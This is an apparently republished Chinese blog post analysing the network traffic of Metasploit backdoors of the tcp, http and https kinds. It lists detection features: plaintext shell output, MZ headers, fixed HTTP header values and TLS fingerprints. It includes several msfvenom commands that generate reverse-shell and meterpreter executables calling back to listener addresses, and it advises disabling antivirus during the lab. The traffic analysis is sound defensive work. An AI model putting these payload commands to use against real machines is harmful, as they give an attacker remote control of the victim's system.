msf后门流量分析

2024-04-16 01:28
文章标签 分析 流量 后门 msf

本文主要是介绍msf后门流量分析,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

前言

分析msf后门的流量主要是分析其数据包的特征,然后msf后门有三种类型。分别是tcp、http、https,这里就说一下这三种类型的数据包的特征,其实也是比较简单的。还有一点,在实验之前记得把病毒防护关了,以防拦截流量。

tcp

首先生成类型为windows/shell/reverse_tcp的后门。

 msfvenom -p windows/shell/reverse_tcp lhost=116.62.152.86 lport=1234 -f exe -o test1.exe

设置攻击载荷、监听端口和IP。

把后门拖到靶机运行,注意要先开启wiresharke再运行后门,而且wiresharke要在靶机运行抓取流量包,靶机上线后随便运行几条命令。

找到相对于的流量包,直接筛选ip就行

然后查看流量包,追踪流选择tcp,可以看到这个流量包内容就是我们刚刚执行的命令以及返回的结果。因为shell类型的后门是直接明文传输的,所以执行的内容会直接显示在流量包里面,这就是windows/shell/reverse_tcp类型的后门流量特征。

再来看看高级一点的meterpreter类型的传输,这个类型的后门分别有32位和64位的。我们都看看它的流量特征,同样先生成后门把shell换成meterpreter就行。

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.236.0.30 lport=4444 -f exe -o test.exe

抓包和查看操作都是一样的,直接看数据包。可以看到到meterpreter类型的后门会进行加密,没有像shell一样是明文传输内容的。而且可以看到有个MZ头,这表示后门是exe格式的,还有个DOS异常也就是后面的这句英文。每个数据都包含MZ标头DOS异常,这就是32位的一个特征。

接着看看64位的会不会有这个特征,后门生成。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.236.32.154 lport=4445 -f exe -o test.exe

抓包分析可以看到尽管下面的内容与32位的有所区别,但都含有MZ头和DOS异常。这就说明了无论是32位的meterpreter类型还是64位的meterpreter类型,它们的特征都是一样的。

http

看完tcp类型的特征现在我们看看http类型的特征,后门生成。

msfvenom -p windows/meterpreter/reverse_http lhost=10.236.32.154 lport=4445 -f exe -o test.exe 

抓包分析可以看到也有MZ头和DOS异常(因为都是meterpreter类型)、但是多了请求包和返回包。此时还看不出有什么特征,我们继续往下看。

我们换个端口再生成一个后门,然后抓包分析看看。哎!现在我们就可以发现其特征了,它们的返回包无论是其字段还是值都是一模一样的。而且,请求包的字段也是一样的,唯一不同的是请求包字段的值有些不一样。比如get字段值不同,host字段值受ip和端口影响也不同,UA字段值前面是相同的都是Mozilla/5.0,其他字段值都是一样的。这显然就不是正常的流量包,可以到百度随便访问页面,每次抓取到的流量包都是不一样的。

这里我们就可以看出http类型的每个流量包都含有这样的特征

请求包

UA:Mozilla/5.0,

Connection: Keep-Alive

Cache-Control: no-cache

返回包

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Connection: Keep-Alive

Server: Apache

Content-Length: 176732

然后64位的话每个流量包都是这样子的,其实32位的大差不差。

如果大量分析到这种类型的流量包,我们就可以判断其是http类型的后门

https

生成后门,运行抓包

msfvenom -p windows/x64/meterpreter/reverse_https lhost=10.236.0.30 lport=4445 -f exe -o test.exe

https的特征是流量中会含有Client Hello和Server Holle这四个包

Client包里面有JA值,Server包里面有JAS值

这个值和你的windows系统版本有关,这里是我的JA值

总结

以上就是msf后门流量的特征啦

最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习

这篇关于msf后门流量分析的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/907453

相关文章

怎样通过分析GC日志来定位Java进程的内存问题

《怎样通过分析GC日志来定位Java进程的内存问题》:本文主要介绍怎样通过分析GC日志来定位Java进程的内存问题,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、GC 日志基础配置1. 启用详细 GC 日志2. 不同收集器的日志格式二、关键指标与分析维度1.

MySQL中的表连接原理分析

《MySQL中的表连接原理分析》:本文主要介绍MySQL中的表连接原理分析,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录1、背景2、环境3、表连接原理【1】驱动表和被驱动表【2】内连接【3】外连接【4编程】嵌套循环连接【5】join buffer4、总结1、背景

python中Hash使用场景分析

《python中Hash使用场景分析》Python的hash()函数用于获取对象哈希值,常用于字典和集合,不可变类型可哈希,可变类型不可,常见算法包括除法、乘法、平方取中和随机数哈希,各有优缺点,需根... 目录python中的 Hash除法哈希算法乘法哈希算法平方取中法随机数哈希算法小结在Python中,

Java Stream的distinct去重原理分析

《JavaStream的distinct去重原理分析》Javastream中的distinct方法用于去除流中的重复元素,它返回一个包含过滤后唯一元素的新流,该方法会根据元素的hashcode和eq... 目录一、distinct 的基础用法与核心特性二、distinct 的底层实现原理1. 顺序流中的去重

关于MyISAM和InnoDB对比分析

《关于MyISAM和InnoDB对比分析》:本文主要介绍关于MyISAM和InnoDB对比分析,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录开篇:从交通规则看存储引擎选择理解存储引擎的基本概念技术原理对比1. 事务支持:ACID的守护者2. 锁机制:并发控制的艺

MyBatis Plus 中 update_time 字段自动填充失效的原因分析及解决方案(最新整理)

《MyBatisPlus中update_time字段自动填充失效的原因分析及解决方案(最新整理)》在使用MyBatisPlus时,通常我们会在数据库表中设置create_time和update... 目录前言一、问题现象二、原因分析三、总结:常见原因与解决方法对照表四、推荐写法前言在使用 MyBATis

Python主动抛出异常的各种用法和场景分析

《Python主动抛出异常的各种用法和场景分析》在Python中,我们不仅可以捕获和处理异常,还可以主动抛出异常,也就是以类的方式自定义错误的类型和提示信息,这在编程中非常有用,下面我将详细解释主动抛... 目录一、为什么要主动抛出异常?二、基本语法:raise关键字基本示例三、raise的多种用法1. 抛

github打不开的问题分析及解决

《github打不开的问题分析及解决》:本文主要介绍github打不开的问题分析及解决,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、找到github.com域名解析的ip地址二、找到github.global.ssl.fastly.net网址解析的ip地址三

Mysql的主从同步/复制的原理分析

《Mysql的主从同步/复制的原理分析》:本文主要介绍Mysql的主从同步/复制的原理分析,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录为什么要主从同步?mysql主从同步架构有哪些?Mysql主从复制的原理/整体流程级联复制架构为什么好?Mysql主从复制注意

java -jar命令运行 jar包时运行外部依赖jar包的场景分析

《java-jar命令运行jar包时运行外部依赖jar包的场景分析》:本文主要介绍java-jar命令运行jar包时运行外部依赖jar包的场景分析,本文给大家介绍的非常详细,对大家的学习或工作... 目录Java -jar命令运行 jar包时如何运行外部依赖jar包场景:解决:方法一、启动参数添加: -Xb